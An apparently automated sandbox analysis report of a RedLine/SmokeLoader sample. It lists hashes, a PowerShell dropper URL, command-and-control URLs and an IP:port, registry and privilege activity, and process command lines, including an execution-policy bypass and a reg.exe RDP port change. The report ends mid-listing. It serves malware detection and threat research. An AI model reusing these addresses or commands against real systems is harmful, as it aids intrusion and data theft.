redline | 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68

Analysis

max time kernel
150s
max time network
150s
platform
windows10_x64
resource
win10-en-20211208
submitted
10-12-2021 00:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Size

218KB
MD5

d23a607770f2dc224e7026ef676c0604
SHA1

c5f14029dec233da0e6b9b884a176445bdd2deec
SHA256

2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68
SHA512

6b2204da4961c05be17186b03ea0bf2dddb1286b32b80c86439e777223ec8e4529e5403eab26450d1293fe3ebd7b4afd28c8b64d95daac1cfc520cb6a3b41e8e

Score

10^/10

redline smokeloader backdoor infostealer persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32

Extracted

Family

redline

195.133.47.114:38627

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\B0DD.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\B0DD.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
93	3596	powershell.exe
95	3596	powershell.exe
96	3596	powershell.exe
97	3596	powershell.exe
99	3596	powershell.exe
101	3596	powershell.exe
103	3596	powershell.exe
105	3596	powershell.exe
107	3596	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

B0DD.exeC1E6.exe49D.exe

pid process

1164 B0DD.exe
1412 C1E6.exe
4040 49D.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1164	B0DD.exe
1412	C1E6.exe
4040	49D.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

pid process

2880
Loads dropped DLL 2 IoCs

Processes:

pid process

1980
1980

pid	process
2880

pid	process
1980
1980

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI941B.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_eiori2sj.t3c.ps1	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI930F.tmp	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI942D.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dhgoqqe1.ey1.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI940A.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI942C.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = af82d12985ecd701	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1120 reg.exe
Runs net.exe

pid	process
1120	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	96	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	97	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	95	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe

pid	process
2760	2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
2760	2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880
2880

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2880
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

628
628
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe

pid process

2760 2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe

pid	process
2880

pid	process
628
628

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	2880
Token: SeCreatePagefilePrivilege	2880
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeIncreaseQuotaPrivilege	1812	powershell.exe
Token: SeSecurityPrivilege	1812	powershell.exe
Token: SeTakeOwnershipPrivilege	1812	powershell.exe
Token: SeLoadDriverPrivilege	1812	powershell.exe
Token: SeSystemProfilePrivilege	1812	powershell.exe
Token: SeSystemtimePrivilege	1812	powershell.exe
Token: SeProfSingleProcessPrivilege	1812	powershell.exe
Token: SeIncBasePriorityPrivilege	1812	powershell.exe
Token: SeCreatePagefilePrivilege	1812	powershell.exe
Token: SeBackupPrivilege	1812	powershell.exe
Token: SeRestorePrivilege	1812	powershell.exe
Token: SeShutdownPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeSystemEnvironmentPrivilege	1812	powershell.exe
Token: SeRemoteShutdownPrivilege	1812	powershell.exe
Token: SeUndockPrivilege	1812	powershell.exe
Token: SeManageVolumePrivilege	1812	powershell.exe
Token: 33	1812	powershell.exe
Token: 34	1812	powershell.exe
Token: 35	1812	powershell.exe
Token: 36	1812	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeIncreaseQuotaPrivilege	3772	powershell.exe
Token: SeSecurityPrivilege	3772	powershell.exe
Token: SeTakeOwnershipPrivilege	3772	powershell.exe
Token: SeLoadDriverPrivilege	3772	powershell.exe
Token: SeSystemProfilePrivilege	3772	powershell.exe
Token: SeSystemtimePrivilege	3772	powershell.exe
Token: SeProfSingleProcessPrivilege	3772	powershell.exe
Token: SeIncBasePriorityPrivilege	3772	powershell.exe
Token: SeCreatePagefilePrivilege	3772	powershell.exe
Token: SeBackupPrivilege	3772	powershell.exe
Token: SeRestorePrivilege	3772	powershell.exe
Token: SeShutdownPrivilege	3772	powershell.exe
Token: SeDebugPrivilege	3772	powershell.exe
Token: SeSystemEnvironmentPrivilege	3772	powershell.exe
Token: SeRemoteShutdownPrivilege	3772	powershell.exe
Token: SeUndockPrivilege	3772	powershell.exe
Token: SeManageVolumePrivilege	3772	powershell.exe
Token: 33	3772	powershell.exe
Token: 34	3772	powershell.exe
Token: 35	3772	powershell.exe
Token: 36	3772	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeIncreaseQuotaPrivilege	2140	powershell.exe
Token: SeSecurityPrivilege	2140	powershell.exe
Token: SeTakeOwnershipPrivilege	2140	powershell.exe
Token: SeLoadDriverPrivilege	2140	powershell.exe
Token: SeSystemProfilePrivilege	2140	powershell.exe
Token: SeSystemtimePrivilege	2140	powershell.exe
Token: SeProfSingleProcessPrivilege	2140	powershell.exe
Token: SeIncBasePriorityPrivilege	2140	powershell.exe
Token: SeCreatePagefilePrivilege	2140	powershell.exe
Token: SeBackupPrivilege	2140	powershell.exe
Token: SeRestorePrivilege	2140	powershell.exe
Token: SeShutdownPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeSystemEnvironmentPrivilege	2140	powershell.exe
Token: SeRemoteShutdownPrivilege	2140	powershell.exe
Token: SeUndockPrivilege	2140	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

2880
2880
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

2880
2880

pid	process
2880
2880

pid	process
2880
2880

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

49D.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 2880 wrote to memory of 1164	2880		B0DD.exe
PID 2880 wrote to memory of 1164	2880		B0DD.exe
PID 2880 wrote to memory of 1164	2880		B0DD.exe
PID 2880 wrote to memory of 1412	2880		C1E6.exe
PID 2880 wrote to memory of 1412	2880		C1E6.exe
PID 2880 wrote to memory of 1412	2880		C1E6.exe
PID 2880 wrote to memory of 4040	2880		49D.exe
PID 2880 wrote to memory of 4040	2880		49D.exe
PID 4040 wrote to memory of 1264	4040	49D.exe	powershell.exe
PID 4040 wrote to memory of 1264	4040	49D.exe	powershell.exe
PID 1264 wrote to memory of 2032	1264	powershell.exe	csc.exe
PID 1264 wrote to memory of 2032	1264	powershell.exe	csc.exe
PID 2032 wrote to memory of 1984	2032	csc.exe	cvtres.exe
PID 2032 wrote to memory of 1984	2032	csc.exe	cvtres.exe
PID 1264 wrote to memory of 2320	1264	powershell.exe	csc.exe
PID 1264 wrote to memory of 2320	1264	powershell.exe	csc.exe
PID 2320 wrote to memory of 2596	2320	csc.exe	cvtres.exe
PID 2320 wrote to memory of 2596	2320	csc.exe	cvtres.exe
PID 1264 wrote to memory of 1812	1264	powershell.exe	powershell.exe
PID 1264 wrote to memory of 1812	1264	powershell.exe	powershell.exe
PID 1264 wrote to memory of 3772	1264	powershell.exe	powershell.exe
PID 1264 wrote to memory of 3772	1264	powershell.exe	powershell.exe
PID 1264 wrote to memory of 2140	1264	powershell.exe	powershell.exe
PID 1264 wrote to memory of 2140	1264	powershell.exe	powershell.exe
PID 1264 wrote to memory of 2804	1264	powershell.exe	reg.exe
PID 1264 wrote to memory of 2804	1264	powershell.exe	reg.exe
PID 1264 wrote to memory of 1120	1264	powershell.exe	reg.exe
PID 1264 wrote to memory of 1120	1264	powershell.exe	reg.exe
PID 1264 wrote to memory of 3756	1264	powershell.exe	reg.exe
PID 1264 wrote to memory of 3756	1264	powershell.exe	reg.exe
PID 1264 wrote to memory of 1476	1264	powershell.exe	net.exe
PID 1264 wrote to memory of 1476	1264	powershell.exe	net.exe
PID 1476 wrote to memory of 2504	1476	net.exe	net1.exe
PID 1476 wrote to memory of 2504	1476	net.exe	net1.exe
PID 1264 wrote to memory of 1468	1264	powershell.exe	cmd.exe
PID 1264 wrote to memory of 1468	1264	powershell.exe	cmd.exe
PID 1468 wrote to memory of 1780	1468	cmd.exe	cmd.exe
PID 1468 wrote to memory of 1780	1468	cmd.exe	cmd.exe
PID 1780 wrote to memory of 2220	1780	cmd.exe	net.exe
PID 1780 wrote to memory of 2220	1780	cmd.exe	net.exe
PID 2220 wrote to memory of 2216	2220	net.exe	net1.exe
PID 2220 wrote to memory of 2216	2220	net.exe	net1.exe
PID 1264 wrote to memory of 700	1264	powershell.exe	cmd.exe
PID 1264 wrote to memory of 700	1264	powershell.exe	cmd.exe
PID 700 wrote to memory of 1268	700	cmd.exe	cmd.exe
PID 700 wrote to memory of 1268	700	cmd.exe	cmd.exe
PID 1268 wrote to memory of 3684	1268	cmd.exe	net.exe
PID 1268 wrote to memory of 3684	1268	cmd.exe	net.exe
PID 3684 wrote to memory of 1940	3684	net.exe	net1.exe
PID 3684 wrote to memory of 1940	3684	net.exe	net1.exe
PID 3132 wrote to memory of 2212	3132	cmd.exe	net.exe
PID 3132 wrote to memory of 2212	3132	cmd.exe	net.exe
PID 2212 wrote to memory of 1548	2212	net.exe	net1.exe
PID 2212 wrote to memory of 1548	2212	net.exe	net1.exe
PID 3228 wrote to memory of 1768	3228	cmd.exe	net.exe
PID 3228 wrote to memory of 1768	3228	cmd.exe	net.exe
PID 1768 wrote to memory of 3128	1768	net.exe	net1.exe
PID 1768 wrote to memory of 3128	1768	net.exe	net1.exe
PID 1404 wrote to memory of 3428	1404	cmd.exe	net.exe
PID 1404 wrote to memory of 3428	1404	cmd.exe	net.exe
PID 3428 wrote to memory of 3812	3428	net.exe	net1.exe
PID 3428 wrote to memory of 3812	3428	net.exe	net1.exe
PID 1840 wrote to memory of 4076	1840	cmd.exe	net.exe
PID 1840 wrote to memory of 4076	1840	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe
"C:\Users\Admin\AppData\Local\Temp\2d3db922b034ffa9f73f10d5fc35bc966db00649fff499f298508498ba12ca68.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2760

C:\Users\Admin\AppData\Local\Temp\B0DD.exe
C:\Users\Admin\AppData\Local\Temp\B0DD.exe
1⤵
- Executes dropped EXE
PID:1164

C:\Users\Admin\AppData\Local\Temp\C1E6.exe
C:\Users\Admin\AppData\Local\Temp\C1E6.exe
1⤵
- Executes dropped EXE
PID:1412

C:\Users\Admin\AppData\Local\Temp\49D.exe
C:\Users\Admin\AppData\Local\Temp\49D.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qp0crqtk\qp0crqtk.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FE3.tmp" "c:\Users\Admin\AppData\Local\Temp\qp0crqtk\CSC45ED1FB13AA1429D92B43D88258E46CE.TMP"
4⤵
PID:1984

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n4ty3n35\n4ty3n35.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25DE.tmp" "c:\Users\Admin\AppData\Local\Temp\n4ty3n35\CSCDDE27C93210C430DAAB0D0F2814DD1C5.TMP"
4⤵
PID:2596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3772

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2804

C:\Windows\system32\reg.exe
